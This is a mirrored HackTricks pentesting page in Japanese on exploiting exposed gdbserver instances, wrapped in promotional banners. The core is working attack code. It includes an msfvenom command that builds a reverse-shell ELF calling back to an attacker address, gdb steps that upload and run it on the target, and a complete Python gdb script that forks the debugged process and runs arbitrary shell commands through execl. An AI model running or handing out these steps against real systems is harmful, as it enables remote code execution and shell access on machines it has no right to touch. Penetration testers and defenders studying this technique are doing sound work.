mirror of
https://github.com/carlospolop/hacktricks
synced 2025-02-16 22:18:27 +00:00
214 lines
10 KiB
Markdown
214 lines
10 KiB
Markdown
# リモートGdbServerのペンテスト
|
||
|
||
<details>
|
||
|
||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||
|
||
* **サイバーセキュリティ会社で働いていますか?** **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
|
||
* [**公式のPEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
|
||
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
|
||
* **ハッキングのトリックを共有するには、PRを** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **と** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **に提出してください。**
|
||
|
||
</details>
|
||
|
||
<figure><img src="../.gitbook/assets/image (1) (1) (2) (4).png" alt=""><figcaption></figcaption></figure>
|
||
|
||
[**DragonJAR Security Conference es un evento internacional de ciberseguridad**](https://www.dragonjarcon.org/) con más de una década que se celebrará el 7 y 8 de septiembre de 2023 en Bogotá, Colombia. Es un evento de gran contenido técnico donde se presentan las últimas investigaciones en español que atrae a hackers e investigadores de todo el mundo.\
|
||
¡Regístrate ahora en el siguiente enlace y no te pierdas esta gran conferencia!:
|
||
|
||
{% embed url="https://www.dragonjarcon.org/" %}
|
||
|
||
## **基本情報**
|
||
|
||
**gdbserver**は、他のプログラムをリモートでデバッグすることができるコンピュータプログラムです。デバッグ対象のプログラムと同じシステムで実行され、**GNUデバッガが別のシステムから接続**できるようにします。つまり、デバッグ対象の実行可能ファイルはターゲットシステム("ターゲット")にのみ存在する必要があり、ソースコードとデバッグ対象のバイナリファイルのコピーは開発者のローカルコンピュータ("ホスト")に存在します。接続はTCPまたはシリアルラインのいずれかで行うことができます。
|
||
|
||
**gdbserverは任意のポートでリッスン**することができ、**nmapはサービスを認識することができません**。
|
||
|
||
## Exploitation
|
||
|
||
### アップロードと実行
|
||
|
||
**msfvenomを使用して簡単にelfバックドアを作成**し、アップロードして実行することができます:
|
||
```bash
|
||
# Trick shared by @B1n4rySh4d0w
|
||
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 PrependFork=true -f elf -o binary.elf
|
||
|
||
chmod +x binary.elf
|
||
|
||
gdb binary.elf
|
||
|
||
# Set remote debuger target
|
||
target extended-remote 10.10.10.11:1337
|
||
|
||
# Upload elf file
|
||
remote put binary.elf binary.elf
|
||
|
||
# Set remote executable file
|
||
set remote exec-file /home/user/binary.elf
|
||
|
||
# Execute reverse shell executable
|
||
run
|
||
|
||
# You should get your reverse-shell
|
||
```
|
||
### 任意のコマンドを実行する
|
||
|
||
デバッガによって任意のコマンドを実行する別の方法があります。これは、[ここから取得したPythonのカスタムスクリプトを使用してデバッガにシェルコマンドを実行させる方法です](https://stackoverflow.com/questions/26757055/gdbserver-execute-shell-commands-of-the-target)。
|
||
```bash
|
||
# Given remote terminal running `gdbserver :2345 ./remote_executable`, we connect to that server.
|
||
target extended-remote 192.168.1.4:2345
|
||
|
||
# Load our custom gdb command `rcmd`.
|
||
source ./remote-cmd.py
|
||
|
||
# Change to a trusty binary and run it to load it
|
||
set remote exec-file /bin/bash
|
||
r
|
||
|
||
# Run until a point where libc has been loaded on the remote process, e.g. start of main().
|
||
tb main
|
||
r
|
||
|
||
# Run the remote command, e.g. `ls`.
|
||
rcmd ls
|
||
```
|
||
まず、**このスクリプトをローカルで作成**してください:
|
||
|
||
{% code title="remote-cmd.py" %}
|
||
```python
|
||
#!/usr/bin/env python3
|
||
|
||
import gdb
|
||
import re
|
||
import traceback
|
||
import uuid
|
||
|
||
|
||
class RemoteCmd(gdb.Command):
|
||
def __init__(self):
|
||
self.addresses = {}
|
||
|
||
self.tmp_file = f'/tmp/{uuid.uuid4().hex}'
|
||
gdb.write(f"Using tmp output file: {self.tmp_file}.\n")
|
||
|
||
gdb.execute("set detach-on-fork off")
|
||
gdb.execute("set follow-fork-mode parent")
|
||
|
||
gdb.execute("set max-value-size unlimited")
|
||
gdb.execute("set pagination off")
|
||
gdb.execute("set print elements 0")
|
||
gdb.execute("set print repeats 0")
|
||
|
||
super(RemoteCmd, self).__init__("rcmd", gdb.COMMAND_USER)
|
||
|
||
def preload(self):
|
||
for symbol in [
|
||
"close",
|
||
"execl",
|
||
"fork",
|
||
"free",
|
||
"lseek",
|
||
"malloc",
|
||
"open",
|
||
"read",
|
||
]:
|
||
self.load(symbol)
|
||
|
||
def load(self, symbol):
|
||
if symbol not in self.addresses:
|
||
address_string = gdb.execute(f"info address {symbol}", to_string=True)
|
||
match = re.match(
|
||
f'Symbol "{symbol}" is at ([0-9a-fx]+) .*', address_string, re.IGNORECASE
|
||
)
|
||
if match and len(match.groups()) > 0:
|
||
self.addresses[symbol] = match.groups()[0]
|
||
else:
|
||
raise RuntimeError(f'Could not retrieve address for symbol "{symbol}".')
|
||
|
||
return self.addresses[symbol]
|
||
|
||
def output(self):
|
||
# From `fcntl-linux.h`
|
||
O_RDONLY = 0
|
||
gdb.execute(
|
||
f'set $fd = (int){self.load("open")}("{self.tmp_file}", {O_RDONLY})'
|
||
)
|
||
|
||
# From `stdio.h`
|
||
SEEK_SET = 0
|
||
SEEK_END = 2
|
||
gdb.execute(f'set $len = (int){self.load("lseek")}($fd, 0, {SEEK_END})')
|
||
gdb.execute(f'call (int){self.load("lseek")}($fd, 0, {SEEK_SET})')
|
||
if int(gdb.convenience_variable("len")) <= 0:
|
||
gdb.write("No output was captured.")
|
||
return
|
||
|
||
gdb.execute(f'set $mem = (void*){self.load("malloc")}($len)')
|
||
gdb.execute(f'call (int){self.load("read")}($fd, $mem, $len)')
|
||
gdb.execute('printf "%s\\n", (char*) $mem')
|
||
|
||
gdb.execute(f'call (int){self.load("close")}($fd)')
|
||
gdb.execute(f'call (int){self.load("free")}($mem)')
|
||
|
||
def invoke(self, arg, from_tty):
|
||
try:
|
||
self.preload()
|
||
|
||
is_auto_solib_add = gdb.parameter("auto-solib-add")
|
||
gdb.execute("set auto-solib-add off")
|
||
|
||
parent_inferior = gdb.selected_inferior()
|
||
gdb.execute(f'set $child_pid = (int){self.load("fork")}()')
|
||
child_pid = gdb.convenience_variable("child_pid")
|
||
child_inferior = list(
|
||
filter(lambda x: x.pid == child_pid, gdb.inferiors())
|
||
)[0]
|
||
gdb.execute(f"inferior {child_inferior.num}")
|
||
|
||
try:
|
||
gdb.execute(
|
||
f'call (int){self.load("execl")}("/bin/sh", "sh", "-c", "exec {arg} >{self.tmp_file} 2>&1", (char*)0)'
|
||
)
|
||
except gdb.error as e:
|
||
if (
|
||
"The program being debugged exited while in a function called from GDB"
|
||
in str(e)
|
||
):
|
||
pass
|
||
else:
|
||
raise e
|
||
finally:
|
||
gdb.execute(f"inferior {parent_inferior.num}")
|
||
gdb.execute(f"remove-inferiors {child_inferior.num}")
|
||
|
||
self.output()
|
||
except Exception as e:
|
||
gdb.write("".join(traceback.TracebackException.from_exception(e).format()))
|
||
raise e
|
||
finally:
|
||
gdb.execute(f'set auto-solib-add {"on" if is_auto_solib_add else "off"}')
|
||
|
||
|
||
RemoteCmd()
|
||
```
|
||
{% endcode %}
|
||
|
||
<figure><img src="../.gitbook/assets/image (1) (1) (2) (4).png" alt=""><figcaption></figcaption></figure>
|
||
|
||
[**DragonJAR Security Conferenceは国際的なサイバーセキュリティイベント**](https://www.dragonjarcon.org/)で、2023年9月7日から8日までコロンビアのボゴタで開催されます。このイベントは、スペイン語で最新の研究が発表される技術的な内容の高いイベントであり、世界中のハッカーや研究者を惹きつけています。
|
||
以下のリンクから今すぐ登録し、この素晴らしいカンファレンスをお見逃しなく!:
|
||
|
||
{% embed url="https://www.dragonjarcon.org/" %}
|
||
|
||
<details>
|
||
|
||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||
|
||
* **サイバーセキュリティ企業で働いていますか?** **HackTricksで会社を宣伝したいですか**?または**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロードしたり**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)をご覧ください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
|
||
* [**公式のPEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
|
||
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**をフォローしてください**。
|
||
* **ハッキングのトリックを共有するには、** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **と** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **にPRを提出してください**。
|
||
|
||
</details>
|